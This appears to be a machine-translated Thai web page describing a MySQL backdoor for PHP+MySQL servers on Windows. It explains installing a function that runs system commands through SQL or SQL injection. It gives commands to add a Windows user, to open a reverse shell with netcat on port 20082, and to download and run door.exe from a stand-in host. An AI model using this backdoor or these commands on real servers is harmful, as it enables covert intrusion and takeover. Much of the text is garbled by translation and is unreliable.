ลับๆ Mysql
ที่มา: ปูรีแมนเชสเตอร์
ลับๆ MySQL คือประตูหลังเพื่อการพัฒนาของ PHP + Mysql เซิร์ฟเวอร์สำหรับ MySQL หลังจากที่ประตูหลังจะติดตั้งเพิ่ม "รัฐ" ฟังก์ชั่นสามารถรันคำสั่งระบบและเริ่มต้นด้วยกระบวนการ Mysql ตามประเภทของ dll ที่ประตูดมกลิ่นกลับมาตระหนักถึงความชาญฉลาด พอร์ตยังไม่มีกระบวนการที่ไม่มีการให้บริการยังไม่มีการผ่านโทรจันผนัง. โปรแกรมใน WIN2003 WINXP + MYSQL5.0.X และภายใต้ผ่าน
การติดตั้งจะ Mysql.php แพร่กระจายไปยังเซิร์ฟเวอร์ PHP ตามกรอกข้อมูลลงใน Host-User-Password DB-คลิกที่ "อัตโนมัติติดตั้งลับๆ MySQL"
หลังจากการติดตั้งที่ประสบความสำเร็จ, Mysql จะเพิ่มขึ้นโดย "รัฐ" ฟังก์ชั่นในขณะที่กระบวนการ MySQL ทำงานดมกลิ่นประตูด้านหลังของลับๆนี้ใน Windows มีสิทธิระบบเดียวกันและ Mysql
การใช้ฟังก์ชั่นของรัฐ
ฟังก์ชั่นของรัฐที่เป็นจริงระบบ PHP () ฟังก์ชัน "ฟังก์ชันเดียวกันสามารถใช้ในการรันคำสั่งระบบกรุณาใส่คำสั่ง SQL." Office และกรอกข้อมูลในงบ MySQL ที่จะดำเนินการเช่น "เลือกรัฐ (" nohack ผู้สุทธิ / เพิ่ม ") คลิกที่" รันคำสั่ง SQL จะใช้ผล
ด้วยฟังก์ชั่นของรัฐตามดมประตูหลังแม้ว่าสูญหาย WebShell ตราบเท่าที่เซิร์ฟเวอร์ชี้ SQL injection, ที่เราจะสามารถผ่านการฉีด. Php? id = 1 และรัฐ ('ผู้ใช้เน็ต') "วิธีการดำเนินการบนเซิร์ฟเวอร์ . คำสั่ง แต่ถ้าจุดที่ฉีดไม่ได้เรายังคงเรียกดมประตูเซิร์ฟเวอร์กลับมาควบคุมที่ส่งไปยังพอร์ตของเซิร์ฟเวอร์ใด ๆ และเปิดให้ Mysql-"จุดเริ่มต้นของแพ็คเก็ตจะสามารถที่จะเรียกดมประตูหลังเช่น.
คำสั่งระบบที่ทำงาน: จาก nc IP 80 -> ใส่ -> Mysql-cmd / c ผู้ใช้เน็ต abc / add> c :/ log.txt, (หมายเหตุ: "!" ครั้งไม่สามารถละเว้น)
2 20,082 พอร์ตของเปลือกที่จะตีกลับเซิร์ฟเวอร์ท้องถิ่น: ระยะแรกของ NC-LP 20 082 ในการตรวจสอบเครื่องของ 20082 พอร์ตแล้วจาก nc IP 80 -> ใส่ -> Mysql-C -> ใส่
ให้ดาวน์โหลดเซิร์ฟเวอร์: จาก IP nc 80 -> ใส่ -> Mysql-http :/ / www.x.com / door.exe c-mydoor.exe (หมายเหตุ: สุดท้าย "ไม่สามารถละเว้น)
นอกเหนือจากการส่ง "MySQL-C-" คำสั่งอื่น ๆ ที่เป็นเสียงก้องไม่มี แต่คำสั่งที่สอดคล้องกันบนเซิร์ฟเวอร์ที่ทำงาน
ถอนการติดตั้ง MySQL บนวิ่ง "รัฐฟังก์ชั่นที่ลดลง" สามารถถอด แต่ในเวลาเดียวกันจะทำให้เกิดกระบวนการ MySQL เพื่อออกกลับมาเป็นปกติหลังจากการรีบูต










































144 Trackback (s)
คุณต้อง บันทึกไว้ใน เพื่อแสดงความคิดเห็น